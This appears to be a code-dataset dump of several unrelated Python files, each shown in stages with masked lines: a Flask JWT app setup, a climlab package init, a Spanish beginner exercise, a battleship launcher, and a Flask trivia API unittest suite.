"step-2": "<mask token>\napp.config.from_object(Config)\ndb.init_app(app)\n<mask token>\n\n\[email protected]_lookup_loader\ndef user_loader_callback(_jwt_header, jwt_data):\n return user_service.first(id=jwt_data['sub'])\n\n\[email protected]_identity_loader\ndef user_identity_lookup(email):\n return user_service.first(email=email).id\n\n\[email protected]_in_blocklist_loader\ndef check_if_token_in_blocklist(jwt_headers, jwt_payload):\n return bool(token_blacklist.get(jwt_payload['jti']))\n\n\ndef create_app():\n add_routes(api)\n add_commands(app)\n login_manager.init_app(app)\n docs = FlaskApiSpec(app)\n register_docs(docs)\n return app\n",
"step-3": "<mask token>\napp = Flask(__name__)\napp.config.from_object(Config)\ndb.init_app(app)\nmigrate = Migrate(app, db)\nadmin = add_admin(app)\napi = Api(app, catch_all_404s=True)\njwt = JWTManager(app)\nbcrypt = Bcrypt(app)\n\n\[email protected]_lookup_loader\ndef user_loader_callback(_jwt_header, jwt_data):\n return user_service.first(id=jwt_data['sub'])\n\n\[email protected]_identity_loader\ndef user_identity_lookup(email):\n return user_service.first(email=email).id\n\n\[email protected]_in_blocklist_loader\ndef check_if_token_in_blocklist(jwt_headers, jwt_payload):\n return bool(token_blacklist.get(jwt_payload['jti']))\n\n\ndef create_app():\n add_routes(api)\n add_commands(app)\n login_manager.init_app(app)\n docs = FlaskApiSpec(app)\n register_docs(docs)\n return app\n",
"step-4": "from flask import Flask\nfrom flask_bcrypt import Bcrypt\nfrom flask_jwt_extended import JWTManager\nfrom flask_migrate import Migrate\nfrom flask_restful import Api\nfrom flask_apispec.extension import FlaskApiSpec\nfrom server.admin import add_admin\nfrom server.config import Config\nfrom server.db import db\nfrom server.cli import add_commands\nfrom server.login_manager import login_manager\nfrom server.resources import add_routes, register_docs\nfrom server.services import user_service, token_blacklist\napp = Flask(__name__)\napp.config.from_object(Config)\ndb.init_app(app)\nmigrate = Migrate(app, db)\nadmin = add_admin(app)\napi = Api(app, catch_all_404s=True)\njwt = JWTManager(app)\nbcrypt = Bcrypt(app)\n\n\[email protected]_lookup_loader\ndef user_loader_callback(_jwt_header, jwt_data):\n return user_service.first(id=jwt_data['sub'])\n\n\[email protected]_identity_loader\ndef user_identity_lookup(email):\n return user_service.first(email=email).id\n\n\[email protected]_in_blocklist_loader\ndef check_if_token_in_blocklist(jwt_headers, jwt_payload):\n return bool(token_blacklist.get(jwt_payload['jti']))\n\n\ndef create_app():\n add_routes(api)\n add_commands(app)\n login_manager.init_app(app)\n docs = FlaskApiSpec(app)\n register_docs(docs)\n return app\n",
"step-5": null,
"step-ids": [
4,
5,
6,
7
]
}
|
[
4,
5,
6,
7
] |
__version__ = '0.2.11'
# This list defines all the modules that will be loaded if a user invokes
# from climLab import *
# totally out of date!
#__all__ = ["constants", "thermo", "orbital_table",
# "long_orbital_table", "insolation", "ebm",
# "column", "convadj"]
#from climlab import radiation
# this should ensure that we can still import constants.py as climlab.constants
from climlab.utils import constants
from climlab.utils import thermo, legendre
# some more useful shortcuts
#from climlab.model import ebm, column
from climlab.model.column import GreyRadiationModel, RadiativeConvectiveModel, BandRCModel
from climlab.model.ebm import EBM, EBM_annual, EBM_seasonal
from climlab.domain import domain
from climlab.domain.field import Field, global_mean
from climlab.domain.axis import Axis
from climlab.process.process import Process, process_like, get_axes
from climlab.process.time_dependent_process import TimeDependentProcess
from climlab.process.implicit import ImplicitProcess
from climlab.process.diagnostic import DiagnosticProcess
from climlab.process.energy_budget import EnergyBudget
|
normal
|
{
"blob_id": "8251a9c798b3cdc2f374d0a0406ccfaa11b7c5e3",
"index": 5699,
"step-1": "<mask token>\n",
"step-2": "__version__ = '0.2.11'\n<mask token>\n",
"step-3": "__version__ = '0.2.11'\nfrom climlab.utils import constants\nfrom climlab.utils import thermo, legendre\nfrom climlab.model.column import GreyRadiationModel, RadiativeConvectiveModel, BandRCModel\nfrom climlab.model.ebm import EBM, EBM_annual, EBM_seasonal\nfrom climlab.domain import domain\nfrom climlab.domain.field import Field, global_mean\nfrom climlab.domain.axis import Axis\nfrom climlab.process.process import Process, process_like, get_axes\nfrom climlab.process.time_dependent_process import TimeDependentProcess\nfrom climlab.process.implicit import ImplicitProcess\nfrom climlab.process.diagnostic import DiagnosticProcess\nfrom climlab.process.energy_budget import EnergyBudget\n",
"step-4": "__version__ = '0.2.11'\n\n# This list defines all the modules that will be loaded if a user invokes\n# from climLab import *\n\n# totally out of date!\n\n#__all__ = [\"constants\", \"thermo\", \"orbital_table\",\n# \"long_orbital_table\", \"insolation\", \"ebm\",\n# \"column\", \"convadj\"]\n\n#from climlab import radiation\n# this should ensure that we can still import constants.py as climlab.constants \nfrom climlab.utils import constants\nfrom climlab.utils import thermo, legendre\n# some more useful shorcuts\n#from climlab.model import ebm, column\nfrom climlab.model.column import GreyRadiationModel, RadiativeConvectiveModel, BandRCModel\nfrom climlab.model.ebm import EBM, EBM_annual, EBM_seasonal\nfrom climlab.domain import domain\nfrom climlab.domain.field import Field, global_mean\nfrom climlab.domain.axis import Axis\nfrom climlab.process.process import Process, process_like, get_axes\nfrom climlab.process.time_dependent_process import TimeDependentProcess\nfrom climlab.process.implicit import ImplicitProcess\nfrom climlab.process.diagnostic import DiagnosticProcess\nfrom climlab.process.energy_budget import EnergyBudget\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
print("Leer 10 números enteros, almacenarlos en un vector y determinar en qué posiciones se encuentran los números con mas de 3 dígitos")
count=1
lista=[]
while count<11:
numero=int(input('Introduzca su %d numero:' %(count)))
lista.append(numero)
count=count+1
listanueva=[]
s= ','
for posicion, element in enumerate(lista):
    if element > 999 or element<-999:
        listanueva.append(posicion)
posiciones= ','.join(str (x) for x in listanueva)
print("Los numeros con mas de tres digitos se encuentran en las posiciones",posiciones)
input()
|
normal
|
{
"blob_id": "9dd5db441044c808274493f16a912d1b65a6c28b",
"index": 5911,
"step-1": "<mask token>\n",
"step-2": "print(\n 'Leer 10 números enteros, almacenarlos en un vector y determinar en qué posiciones se encuentran los números con mas de 3 dígitos'\n )\n<mask token>\nwhile count < 11:\n numero = int(input('Introduzca su %d numero:' % count))\n lista.append(numero)\n count = count + 1\n<mask token>\nfor element in lista:\n if element > 999 or element < -999:\n listanueva.append(lista.index(element))\n<mask token>\nprint('Los numeros con mas de tres digitos se encuentran en las posiciones',\n posiciones)\ninput()\n",
"step-3": "print(\n 'Leer 10 números enteros, almacenarlos en un vector y determinar en qué posiciones se encuentran los números con mas de 3 dígitos'\n )\ncount = 1\nlista = []\nwhile count < 11:\n numero = int(input('Introduzca su %d numero:' % count))\n lista.append(numero)\n count = count + 1\nlistanueva = []\ns = ','\nfor element in lista:\n if element > 999 or element < -999:\n listanueva.append(lista.index(element))\nposiciones = ','.join(str(x) for x in listanueva)\nprint('Los numeros con mas de tres digitos se encuentran en las posiciones',\n posiciones)\ninput()\n",
"step-4": "print(\"Leer 10 números enteros, almacenarlos en un vector y determinar en qué posiciones se encuentran los números con mas de 3 dígitos\")\r\n\r\n\r\ncount=1\r\nlista=[]\r\nwhile count<11: \r\n numero=int(input('Introduzca su %d numero:' %(count)))\r\n lista.append(numero)\r\n count=count+1\r\nlistanueva=[]\r\ns= ','\r\n \r\nfor element in lista:\r\n\r\n if element > 999 or element<-999:\r\n listanueva.append(lista.index(element))\r\n\r\nposiciones= ','.join(str (x) for x in listanueva)\r\nprint(\"Los numeros con mas de tres digitos se encuentran en las posiciones\",posiciones)\r\ninput()",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from battleship.board import Board
from battleship.game import Game
import string
# Board
row_num = list(string.ascii_lowercase[:10]) # A-J
col_num = 10
board = Board(row_num, col_num)
board.display_board()
# Game
guesses = 25
quit = 'q'
game = Game(guesses, quit)
game.take_shot("\nChoose a spot to fire at in enemy seas: ", board)
# Ships
# 2x submarine = 1
# 2x destroyer = 2
# 1x cruiser = 3
# 1x battleship = 4
# 1x carrier = 5
|
normal
|
{
"blob_id": "dd06847c3eb9af6e84f247f8f0dd03961d83688e",
"index": 9453,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nboard.display_board()\n<mask token>\ngame.take_shot(\"\"\"\nChoose a spot to fire at in enemy seas: \"\"\", board)\n",
"step-3": "<mask token>\nrow_num = list(string.ascii_lowercase[:10])\ncol_num = 10\nboard = Board(row_num, col_num)\nboard.display_board()\nguesses = 25\nquit = 'q'\ngame = Game(guesses, quit)\ngame.take_shot(\"\"\"\nChoose a spot to fire at in enemy seas: \"\"\", board)\n",
"step-4": "from battleship.board import Board\nfrom battleship.game import Game\nimport string\nrow_num = list(string.ascii_lowercase[:10])\ncol_num = 10\nboard = Board(row_num, col_num)\nboard.display_board()\nguesses = 25\nquit = 'q'\ngame = Game(guesses, quit)\ngame.take_shot(\"\"\"\nChoose a spot to fire at in enemy seas: \"\"\", board)\n",
"step-5": "from battleship.board import Board\nfrom battleship.game import Game\n\nimport string\n\n# Board\nrow_num = list(string.ascii_lowercase[:10]) # A-J\ncol_num = 10\nboard = Board(row_num, col_num) \nboard.display_board()\n\n# Game\nguesses = 25\nquit = 'q'\ngame = Game(guesses, quit)\ngame.take_shot(\"\\nChoose a spot to fire at in enemy seas: \", board)\n\n# Ships\n# 2x submarine = 1\n# 2x destroyer = 2\n# 1x cruiser = 3\n# 1x battleship = 4\n# 1x carrier = 5\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import os
import unittest
import json
from flask_sqlalchemy import SQLAlchemy
from flaskr import create_app
from models import setup_db, Question
DB_HOST = os.getenv('DB_HOST', '127.0.0.1:5432')
DB_USER = os.getenv('DB_USER', 'postgres')
DB_PASSWORD = os.getenv('DB_PASSWORD', 'postgres')
DB_NAME = os.getenv('DB_NAME', 'trivia_test')
DB_PATH = 'postgresql+psycopg2://{}:{}@{}/{}'.\
format(DB_USER, DB_PASSWORD, DB_HOST, DB_NAME)
class TriviaTestCase(unittest.TestCase):
"""This class represents the trivia test case"""
def setUp(self):
"""Define test variables and initialize app."""
self.app = create_app()
self.client = self.app.test_client
self.database_path = DB_PATH
setup_db(self.app, self.database_path)
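        # fixtures and payloads reused across the tests below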
self.question_to_delete = Question(
question='What?',
answer='huh!',
category=1,
difficulty=1
)
self.new_question = {
'question': 'What?',
'answer': 'What',
'category': 1,
'difficulty': 1
}
self.quizz = {
'previous_questions': [1, 3],
'quiz_category': {'id': 1, 'type': 'Science'}
}
# binds the app to the current context
with self.app.app_context():
self.db = SQLAlchemy()
self.db.init_app(self.app)
# create all tables
self.db.create_all()
def tearDown(self):
"""Executed after reach test"""
pass
def test_get_categories_if_success(self):
res = self.client().get('/categories')
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(data['categories'])
def test_get_categories_if_non_existing_category(self):
res = self.client().get('/categories/10000')
data = json.loads(res.data)
self.assertEqual(res.status_code, 404)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'not found')
def test_get_questions_if_success(self):
res = self.client().get('/questions')
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(data['questions'])
self.assertTrue(data['total_questions'])
self.assertTrue(data['categories'])
self.assertIsNone(data['current_category'])
def test_get_questions_if_invalid_page(self):
res = self.client().get('/questions?page=10000')
data = json.loads(res.data)
self.assertEqual(res.status_code, 404)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'not found')
def test_delete_question_if_success(self):
self.question_to_delete.insert()
res = self.client().delete(f'/questions/{self.question_to_delete.id}')
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertEqual(data['deleted_question'], self.question_to_delete.id)
self.assertTrue(data['questions'])
self.assertTrue(data['total_questions'])
def test_delete_questions_if_non_existing_book(self):
res = self.client().delete('/questions/100000')
data = json.loads(res.data)
self.assertEqual(res.status_code, 422)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'unprocessable')
def test_create_question_if_success(self):
res = self.client().post('/questions', json=self.new_question)
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(data['created_question'])
def test_create_question_if_bad_endpoint(self):
res = self.client().post('/questions/45', json=self.new_question)
data = json.loads(res.data)
self.assertEqual(res.status_code, 405)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'method not allowed')
def test_search_questions_with_results(self):
res = self.client().post(
'/questions/search', json={'search': 'Van Gogh'}
)
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(data['total_questions'])
self.assertEqual(len(data['questions']), 1)
def test_search_questions_without_results(self):
res = self.client().post(
'/questions/search', json={'search': 'Weird search'}
)
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertEqual(data['total_questions'], 0)
self.assertEqual(len(data['questions']), 0)
def test_search_questions_failure(self):
res = self.client().post(
'/questions/search', json={'wrong_key': 'Van Gogh'}
)
data = json.loads(res.data)
self.assertEqual(res.status_code, 400)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'bad request')
def test_get_questions_by_category_if_success(self):
res = self.client().get('/categories/1/questions')
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(data['questions'])
self.assertTrue(data['total_questions'])
self.assertEqual(data['current_category'], 1)
def test_get_questions_by_category_if_failure(self):
res = self.client().get('/categories/10000/questions')
data = json.loads(res.data)
self.assertEqual(res.status_code, 404)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'not found')
def test_get_quizz_question_if_success(self):
res = self.client().post('/quizzes', json=self.quizz)
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(data['question'])
def test_get_quizz_question_if_bad_request(self):
res = self.client().post('/quizzes/4', json=self.quizz)
data = json.loads(res.data)
self.assertEqual(res.status_code, 404)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'not found')
"""
TODO
    Write at least one test for each endpoint for successful
    operation and for expected errors.
"""
# Make the tests conveniently executable
if __name__ == "__main__":
unittest.main()
|
normal
|
{
"blob_id": "364ac79e0f885c67f2fff57dfe3ddde63f0c269e",
"index": 995,
"step-1": "<mask token>\n\n\nclass TriviaTestCase(unittest.TestCase):\n <mask token>\n\n def setUp(self):\n \"\"\"Define test variables and initialize app.\"\"\"\n self.app = create_app()\n self.client = self.app.test_client\n self.database_path = DB_PATH\n setup_db(self.app, self.database_path)\n self.question_to_delete = Question(question='What?', answer='huh!',\n category=1, difficulty=1)\n self.new_question = {'question': 'What?', 'answer': 'What',\n 'category': 1, 'difficulty': 1}\n self.quizz = {'previous_questions': [1, 3], 'quiz_category': {'id':\n 1, 'type': 'Science'}}\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)\n self.db.create_all()\n\n def tearDown(self):\n \"\"\"Executed after reach test\"\"\"\n pass\n\n def test_get_categories_if_success(self):\n res = self.client().get('/categories')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['categories'])\n\n def test_get_categories_if_non_existing_category(self):\n res = self.client().get('/categories/10000')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n\n def test_get_questions_if_success(self):\n res = self.client().get('/questions')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['questions'])\n self.assertTrue(data['total_questions'])\n self.assertTrue(data['categories'])\n self.assertIsNone(data['current_category'])\n\n def test_get_questions_if_invalid_page(self):\n res = self.client().get('/questions?page=10000')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n\n def test_delete_question_if_success(self):\n self.question_to_delete.insert()\n res = self.client().delete(f'/questions/{self.question_to_delete.id}')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertEqual(data['deleted_question'], self.question_to_delete.id)\n self.assertTrue(data['questions'])\n self.assertTrue(data['total_questions'])\n <mask token>\n\n def test_create_question_if_success(self):\n res = self.client().post('/questions', json=self.new_question)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['created_question'])\n\n def test_create_question_if_bad_endpoint(self):\n res = self.client().post('/questions/45', json=self.new_question)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 405)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'method not allowed')\n\n def test_search_questions_with_results(self):\n res = self.client().post('/questions/search', json={'search':\n 'Van Gogh'})\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['total_questions'])\n self.assertEqual(len(data['questions']), 1)\n\n def test_search_questions_without_results(self):\n res = self.client().post('/questions/search', json={'search':\n 'Weird search'})\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertEqual(data['total_questions'], 0)\n 
self.assertEqual(len(data['questions']), 0)\n <mask token>\n\n def test_get_questions_by_category_if_success(self):\n res = self.client().get('/categories/1/questions')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['questions'])\n self.assertTrue(data['total_questions'])\n self.assertEqual(data['current_category'], 1)\n\n def test_get_questions_by_category_if_failure(self):\n res = self.client().get('/categories/10000/questions')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n <mask token>\n\n def test_get_quizz_question_if_bad_request(self):\n res = self.client().post('/quizzes/4', json=self.quizz)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TriviaTestCase(unittest.TestCase):\n <mask token>\n\n def setUp(self):\n \"\"\"Define test variables and initialize app.\"\"\"\n self.app = create_app()\n self.client = self.app.test_client\n self.database_path = DB_PATH\n setup_db(self.app, self.database_path)\n self.question_to_delete = Question(question='What?', answer='huh!',\n category=1, difficulty=1)\n self.new_question = {'question': 'What?', 'answer': 'What',\n 'category': 1, 'difficulty': 1}\n self.quizz = {'previous_questions': [1, 3], 'quiz_category': {'id':\n 1, 'type': 'Science'}}\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)\n self.db.create_all()\n\n def tearDown(self):\n \"\"\"Executed after reach test\"\"\"\n pass\n\n def test_get_categories_if_success(self):\n res = self.client().get('/categories')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['categories'])\n\n def test_get_categories_if_non_existing_category(self):\n res = self.client().get('/categories/10000')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n\n def test_get_questions_if_success(self):\n res = self.client().get('/questions')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['questions'])\n self.assertTrue(data['total_questions'])\n self.assertTrue(data['categories'])\n self.assertIsNone(data['current_category'])\n\n def test_get_questions_if_invalid_page(self):\n res = self.client().get('/questions?page=10000')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n\n def test_delete_question_if_success(self):\n self.question_to_delete.insert()\n res = self.client().delete(f'/questions/{self.question_to_delete.id}')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertEqual(data['deleted_question'], self.question_to_delete.id)\n self.assertTrue(data['questions'])\n self.assertTrue(data['total_questions'])\n <mask token>\n\n def test_create_question_if_success(self):\n res = self.client().post('/questions', json=self.new_question)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['created_question'])\n\n def test_create_question_if_bad_endpoint(self):\n res = self.client().post('/questions/45', json=self.new_question)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 405)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'method not allowed')\n\n def test_search_questions_with_results(self):\n res = self.client().post('/questions/search', json={'search':\n 'Van Gogh'})\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['total_questions'])\n self.assertEqual(len(data['questions']), 1)\n\n def test_search_questions_without_results(self):\n res = self.client().post('/questions/search', json={'search':\n 'Weird search'})\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertEqual(data['total_questions'], 0)\n 
self.assertEqual(len(data['questions']), 0)\n <mask token>\n\n def test_get_questions_by_category_if_success(self):\n res = self.client().get('/categories/1/questions')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['questions'])\n self.assertTrue(data['total_questions'])\n self.assertEqual(data['current_category'], 1)\n\n def test_get_questions_by_category_if_failure(self):\n res = self.client().get('/categories/10000/questions')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n\n def test_get_quizz_question_if_success(self):\n res = self.client().post('/quizzes', json=self.quizz)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['question'])\n\n def test_get_quizz_question_if_bad_request(self):\n res = self.client().post('/quizzes/4', json=self.quizz)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n <mask token>\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TriviaTestCase(unittest.TestCase):\n <mask token>\n\n def setUp(self):\n \"\"\"Define test variables and initialize app.\"\"\"\n self.app = create_app()\n self.client = self.app.test_client\n self.database_path = DB_PATH\n setup_db(self.app, self.database_path)\n self.question_to_delete = Question(question='What?', answer='huh!',\n category=1, difficulty=1)\n self.new_question = {'question': 'What?', 'answer': 'What',\n 'category': 1, 'difficulty': 1}\n self.quizz = {'previous_questions': [1, 3], 'quiz_category': {'id':\n 1, 'type': 'Science'}}\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)\n self.db.create_all()\n\n def tearDown(self):\n \"\"\"Executed after reach test\"\"\"\n pass\n\n def test_get_categories_if_success(self):\n res = self.client().get('/categories')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['categories'])\n\n def test_get_categories_if_non_existing_category(self):\n res = self.client().get('/categories/10000')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n\n def test_get_questions_if_success(self):\n res = self.client().get('/questions')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['questions'])\n self.assertTrue(data['total_questions'])\n self.assertTrue(data['categories'])\n self.assertIsNone(data['current_category'])\n\n def test_get_questions_if_invalid_page(self):\n res = self.client().get('/questions?page=10000')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n\n def test_delete_question_if_success(self):\n self.question_to_delete.insert()\n res = self.client().delete(f'/questions/{self.question_to_delete.id}')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertEqual(data['deleted_question'], self.question_to_delete.id)\n self.assertTrue(data['questions'])\n self.assertTrue(data['total_questions'])\n\n def test_delete_questions_if_non_existing_book(self):\n res = self.client().delete('/questions/100000')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 422)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'unprocessable')\n\n def test_create_question_if_success(self):\n res = self.client().post('/questions', json=self.new_question)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['created_question'])\n\n def test_create_question_if_bad_endpoint(self):\n res = self.client().post('/questions/45', json=self.new_question)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 405)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'method not allowed')\n\n def test_search_questions_with_results(self):\n res = self.client().post('/questions/search', json={'search':\n 'Van Gogh'})\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['total_questions'])\n self.assertEqual(len(data['questions']), 1)\n\n def test_search_questions_without_results(self):\n res = 
self.client().post('/questions/search', json={'search':\n 'Weird search'})\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertEqual(data['total_questions'], 0)\n self.assertEqual(len(data['questions']), 0)\n\n def test_search_questions_failure(self):\n res = self.client().post('/questions/search', json={'wrong_key':\n 'Van Gogh'})\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 400)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'bad request')\n\n def test_get_questions_by_category_if_success(self):\n res = self.client().get('/categories/1/questions')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['questions'])\n self.assertTrue(data['total_questions'])\n self.assertEqual(data['current_category'], 1)\n\n def test_get_questions_by_category_if_failure(self):\n res = self.client().get('/categories/10000/questions')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n\n def test_get_quizz_question_if_success(self):\n res = self.client().post('/quizzes', json=self.quizz)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['question'])\n\n def test_get_quizz_question_if_bad_request(self):\n res = self.client().post('/quizzes/4', json=self.quizz)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n <mask token>\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass TriviaTestCase(unittest.TestCase):\n \"\"\"This class represents the trivia test case\"\"\"\n\n def setUp(self):\n \"\"\"Define test variables and initialize app.\"\"\"\n self.app = create_app()\n self.client = self.app.test_client\n self.database_path = DB_PATH\n setup_db(self.app, self.database_path)\n self.question_to_delete = Question(question='What?', answer='huh!',\n category=1, difficulty=1)\n self.new_question = {'question': 'What?', 'answer': 'What',\n 'category': 1, 'difficulty': 1}\n self.quizz = {'previous_questions': [1, 3], 'quiz_category': {'id':\n 1, 'type': 'Science'}}\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)\n self.db.create_all()\n\n def tearDown(self):\n \"\"\"Executed after reach test\"\"\"\n pass\n\n def test_get_categories_if_success(self):\n res = self.client().get('/categories')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['categories'])\n\n def test_get_categories_if_non_existing_category(self):\n res = self.client().get('/categories/10000')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n\n def test_get_questions_if_success(self):\n res = self.client().get('/questions')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['questions'])\n self.assertTrue(data['total_questions'])\n self.assertTrue(data['categories'])\n self.assertIsNone(data['current_category'])\n\n def test_get_questions_if_invalid_page(self):\n res = self.client().get('/questions?page=10000')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n\n def test_delete_question_if_success(self):\n self.question_to_delete.insert()\n res = self.client().delete(f'/questions/{self.question_to_delete.id}')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertEqual(data['deleted_question'], self.question_to_delete.id)\n self.assertTrue(data['questions'])\n self.assertTrue(data['total_questions'])\n\n def test_delete_questions_if_non_existing_book(self):\n res = self.client().delete('/questions/100000')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 422)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'unprocessable')\n\n def test_create_question_if_success(self):\n res = self.client().post('/questions', json=self.new_question)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['created_question'])\n\n def test_create_question_if_bad_endpoint(self):\n res = self.client().post('/questions/45', json=self.new_question)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 405)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'method not allowed')\n\n def test_search_questions_with_results(self):\n res = self.client().post('/questions/search', json={'search':\n 'Van Gogh'})\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['total_questions'])\n self.assertEqual(len(data['questions']), 1)\n\n def 
